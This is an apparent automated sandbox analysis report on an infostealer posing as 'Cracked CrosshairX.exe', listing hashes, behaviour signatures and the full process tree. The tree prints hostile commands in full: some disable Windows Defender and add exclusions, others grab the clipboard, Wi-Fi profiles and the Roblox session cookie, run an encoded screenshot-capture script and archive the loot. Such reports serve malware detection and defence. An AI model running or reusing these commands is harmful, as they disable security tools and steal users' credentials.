Analysis

  • max time kernel
    105s
  • max time network
    112s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 00:19

General

  • Target

    Cracked CrosshairX.exe

  • Size

    7.6MB

  • MD5

    3c4dee08ed32646f13025076aa6e4610

  • SHA1

    346ae3d964863748ac9dc63b4ba1937aa9b11a46

  • SHA256

    0825ab9924b136f7fd4843d396f76c37db795165055f636e131c1b34899a2892

  • SHA512

    c159cf5c2fa4d45201c4a6a0eb5c377d9259577a0c9839f85b15c2ee5f55762f72d791812b0cfc2c9a34805f91e3067fbadb4bb5faf4b3b13eb276e9873b367f

  • SSDEEP

    196608:kWs06CvYywfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAo:PcIH20drLYRZjo

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 55 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cracked CrosshairX.exe
    "C:\Users\Admin\AppData\Local\Temp\Cracked CrosshairX.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3232
    • C:\Users\Admin\AppData\Local\Temp\Cracked CrosshairX.exe
      "C:\Users\Admin\AppData\Local\Temp\Cracked CrosshairX.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cracked CrosshairX.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4496
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cracked CrosshairX.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5900
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You Got Hacked', 0, '...', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You Got Hacked', 0, '...', 0+16);close()"
          4⤵
            PID:5304
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4908
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1328
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4932
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5084
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:5424
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1572
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:1896
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1448
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:5752
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1608
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2024
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‏​.scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1176
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‏​.scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:6044
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1900
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1780
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5360
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:5404
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:2864
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:5788
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:5792
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2136
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:848
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:3384
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3988
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:772
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2012
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:5088
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:2584
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:5488
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:2664
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:4464
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:3592
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4676
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j0hrwybu\j0hrwybu.cmdline"
                                    5⤵
                                      PID:5424
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84DF.tmp" "c:\Users\Admin\AppData\Local\Temp\j0hrwybu\CSC80587E59CFD4E53A02E575E545C936C.TMP"
                                        6⤵
                                          PID:1576
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4868
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:5272
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:440
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:2404
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:1668
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4504
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:1140
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:4688
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4568
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:1672
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:1384
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:1572
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:2588
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:3228
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:1448
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:2128
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:6000
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2476
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:4860
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3012
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:2724
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:1260
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32322\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\dnvQg.zip" *"
                                                                      3⤵
                                                                        PID:5600
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI32322\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI32322\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\dnvQg.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:5948
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:4748
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            4⤵
